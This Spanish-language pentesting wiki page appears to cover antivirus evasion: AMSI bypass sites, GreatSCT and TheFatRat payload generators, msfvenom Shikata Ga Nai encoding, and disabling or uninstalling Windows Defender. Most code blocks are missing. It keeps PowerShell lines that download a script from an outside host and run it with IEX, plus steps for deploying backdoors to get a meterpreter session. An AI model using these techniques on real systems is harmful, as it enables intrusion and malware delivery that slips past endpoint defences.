Page cover

🛡️Evasión de Antivirus

Son las técnicas utilizadas por los atacantes para evitar que el software antivirus detecte y bloquee malware o virus en un sistema para llevar a cabo ataques exitosos sin ser detectados.

Evasión de Antivirus en Endpoints

Bypass de ejecución de scripts en tiempo real

El bypass de ejecución de scripts en tiempo real se refiere a técnicas utilizadas por los atacantes para evitar que los sistemas de seguridad detecten y bloqueen la ejecución de scripts maliciosos en tiempo real.

Descarga de un ejecutable detectado como malicioso en Powershell

IEX (New-Object Net.WebClient).DownloadString("http://172.16.123.137:8000/PowerView.ps1")
(New-Object System.NET.WebClient).DownloadFile("http://172.16.123.137:8000/PowerView.ps1","powerview.ps1")

Esto lo detectan los antivirus, por lo que vamos a evadirlo con otras técnicas

AMSI Bypass Methods

El AMSI (Antimalware Scan Interface) es una interfaz de programación de aplicaciones que permite a los proveedores de software antivirus y antimalware integrar sus soluciones en aplicaciones y servicios de Windows. Sin embargo, los atacantes pueden utilizar técnicas para eludir la detección de AMSI y ejecutar código malicioso sin ser detectados.

LogoAMSI Bypass MethodsPentest Laboratories

AMSI Bypass

  • Copiar y pegar en la terminal:

Base64 Encoded

  • Copiar y pegar en la terminal:

AMSI Fail

AMSI.failamsi.fail

  • Copiar y pegar el código generado en la máquina objetivo, y ya estaríamos bypass 😎

GreatSCT

Herramienta automática para bypass de defensas. Es una herramienta de código abierto diseñada para generar payloads maliciosos para pruebas de penetración y evaluación de seguridad. La herramienta está escrita en Python y permite a los usuarios crear payloads personalizados para diferentes sistemas operativos y arquitecturas.

LogoGitHub - GreatSCT/GreatSCT: The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.GitHub

  • Genera payloads compatibles con MetaSploit para bypassear defensas

  • Instalar siguiendo los pasos del repositorio.

  • Dar un nombre al payload o dejar por defecto

  • Nos da las instrucciones para ejecutarlo:

  • Enviar el payload.dll a la maquina windows

🔄File Transfers

  • Y ya tenemos abierta la sesión de meterpreter, haciendo el bypass del antivirus

Payload de Msfvenom con codificación

Codificación Shikata Ga Nai

Esto generará una carga útil con el exeformato llamado TeamViewerInstall.exe, que está diseñado para funcionar en procesadores de arquitectura x86 para la plataforma Windows, con una carga útil de shell Meterpreter inversa_tcp oculta, codificada una vez con el esquema Shikata Ga Nai.

Para que sea menos detectado por los antivirus podemos codificarlo varias veces

Al subir el payload a Virustotal vemos que lo siguen detectando los antivirus incluso con varias capas de cifrado. Alternativamente, Metasploit ofrece una herramienta llamada msf-virustotal que podemos usar con una clave API para analizar nuestros payloads (requiere registro gratuito en VirusTotal)

The Fat Rat

TheFatRat es una herramienta de código abierto que se utiliza para crear payloads maliciosos para pruebas de penetración y evaluación de seguridad. Es una herramienta de fácil uso y cuenta con una interfaz gráfica de usuario intuitiva que permite a los usuarios crear payloads personalizados para diferentes sistemas operativos y arquitecturas.

LogoGitHub - screetsec/TheFatRat: Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection .GitHub

  • Instalar segun las instrucciones del repo

Ejemplo de Bypass con TheFatRat

Crear un backdoor con Fudwin 1.0

  • Ejecutar el .exe en la máquina destino

  • Ya tendríamos acceso

Deshabilitar Windows Defender por comandos

Ejecutar los siguientes comandos en una Powershell como administrador:

Tip: Puedes copiar todo el contenido y pegarlo en la PowerShell para evitar ir uno por uno

Para habilitarlo de nuevo solo tenemos que introducir los mismos comandos terminado en $false

Verificar que esta deshabilitado

Podemos ejecutar el siguiente script en Powershell para hacer una verificación completa del estado de seguridad y los elementos que han sido deshabilitados.

Tip: Puedes copiar y pegar directamente el siguiente script en Powershell para ejecutarlo directamente

Eso nos da un reporte visual de los componentes que aún se están ejecutando:

Observamos que algunas opciones persisten activadas tras desactivar componentes debido a:

  1. Arquitectura en Capas

    • Solo se desactivan funciones periféricas (ej: monitoreo en tiempo real)

    • El núcleo del antivirus permanece activo por diseño

  2. Tamper Protection (Protección contra alteraciones)

    • Bloquea cambios no autorizados en la configuración

    • Activado por defecto en Windows 10/11

    • Requiere desactivación manual en:

Conclusión

Una desactivación completa exige:

  • Deshabilitar Tamper Protection primero

  • Modificar políticas vía registro/GPO

  • Reiniciar servicios críticos

Defender emplea defensas en profundidad que requieren intervenciones específicas para su desactivación total.

Desinstalar Windows Defender por comandos

Necesitamos privilegios de administrador

AnteriorEvasión de WAFsSiguienteHerramientas de Evasión

Última actualización

¿Te fue útil?